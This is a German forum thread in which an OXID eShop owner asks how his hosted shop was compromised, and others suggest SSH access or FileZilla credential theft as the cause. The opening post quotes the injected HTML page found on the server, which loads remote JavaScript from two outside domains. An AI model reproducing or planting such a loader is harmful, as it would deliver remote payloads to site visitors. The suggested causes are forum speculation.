Hallo Leute, ich arbeite mit der Oxid CE 4.6.4. Soeben hat unser Hoster unseren Shop vom Netz genommen, mit dem Vermerk:
“wir haben festgestellt, dass Ihr Account genutzt wurde, um schadhafte Software auf Ihrem Server zu installieren und auszuführen. Diese Software wurde dann genutzt, um Angriffe auf fremde Systeme durchzuführen.”
In der Tat finde ich auf den Webserver einige Ordner nach dem Schema “BCY9FD” die jeweils mit einer HTML-Datei gefüllt sind mit dem Inhalt:
<html>
<h1>WAIT PLEASE</h1>
<h3>Loading…</h3>
<script type=“text/javascript” src=“http://mabuhay63.com/q9Vgqgen/js.js”></script>
<script type=“text/javascript” src=“http://pst.org.br/Wi4aFSLZ/js.js”></script>
</html>
Den FTP Zugang in unserer Firma nutzen nur mein Partner und ich. An dritte wurde dieser nicht weiter gegeben. Die einzigen installierten Module stammen von Oxid, D3 und Aggrosoft. Wie kann sowas passieren und wie kann ich das vermeiden?
Gruß Maik
Hi Thunder, nein ein Premium 6 Sterne Web-Paket bei Domainfactory. Deren Technik hat unseren Shop direkt dicht gemacht. Die Sicherheitseinstellungen vom Shop waren alle bis gestern Abend noch ok. Nicxhts verändert und auch nirgendwo was von Hand programmiert, was eine Tür öffnen könnte.
Ich habe keine Infos zum Premum 6 Sterne Web-Paket gefunden, aber da die Dateien auf dem Server ausgetauscht wurden, denke ich, dass der Server und nicht der Shop an sich gehackt wurde. Shop zu hacken hätte höchstens Zugriff auf alle Shopfunktionen und Kundendaten gebracht und man hätte vielleicht noch die Datenbank leeren können.
Habt ihr außer dem FTP Zugang noch einen SSH Zugriff? Sonst mal in den System Logs (falls solche in dem Paket verfügbar sind) schauen.
Hi Thunder, nen SSH Zugang haben wir in der Tat aber noch nie genutzt. Das Log-File ist absolut sauber, da sit nix zu finden. Weder im Anbieret-Log noch im Oxid-Log. Im ANbieter-Log finde ich weder was von gestern noch von heute. Wie können dann Ordner auf dem FTP erstellt werden mit HTML Dateien?
Ach ja, das Angebot von denen findest Du hier:
https://order.df.eu/germany/bestellung.php?clearsession=1&globalaction=hosting&addtarif2wk=df-11-1-managedhosting-pro-2&action=reconfigure
ah ja, demnach war SSH auch nicht abgesichert. Da haben wir doch die Quelle.
Glaube kaum das das an dem SSH lag denn wir haben zwei mögliche Zugänge und keiner ist eingerichtet. Was nicht eingerichtet ist, kann auch nicht funktionieren. Also save
Sorry! aber ich verstehe das ganze wieder mal nicht. die von Dir genannter ordner (“BCY9FD” ) befindet sich NUR im OXID eShop verzeichnis oder auch wo anders? Wenn nicht, kontaktiere bitte doch deinen Provider. In dem fall kann NUR dein Provider Dir weiterhelfen, das ganze hat mit OXID Software überhaupt nicht zu tun.
Struktur kommt mir aber bekannt vor, vor 3 Jahren war FTP Programm Filezilla (die man kostenlos im Netz herunterladen kann) dafür verantwortlich.
Beim hochladen der Daten via Filezilla wurden damals alle js dateien injiziert.
Grüße Markus
Hallo Markus,
na hat ja auch keiner gesagt das Oxid dran schuld ist o.ä. Aber FileZilla ist mal ein heißer Tipp. Das ist das einzige was wir geändert haben. Vielen Dank!
Maik,
ich suche noch den Link wegen FileZilla und poste dann Ihn für Dich hier.
Original Artikel über FileZilla und JS Hack konnte ich leider nicht finden:
Java Script Hack
Grüße Markus
Hey super, vielen lieben Dank
Moin Maik,
hmm… Vielleicht solltet ihr dann dringend mal was ändern:
[B][U]DEN VIRENSCANNER[/U][/B]
Beste Grüsse
Thomas
Filezilla ist ja auch generell total ungeeignet theoretisch. Die Entwickler wissen von dem Problem dass die Passwörte rbzw Daten nicht verschlüsselt werden, ist aber kein Bug sondern vom Design so beabsichtigt. Bzw soll man sich selber um die Verschlüsselung seiner Daten kümmern. Hatte auch einen Kunden bei uns betroffen der Filezilla nutzt.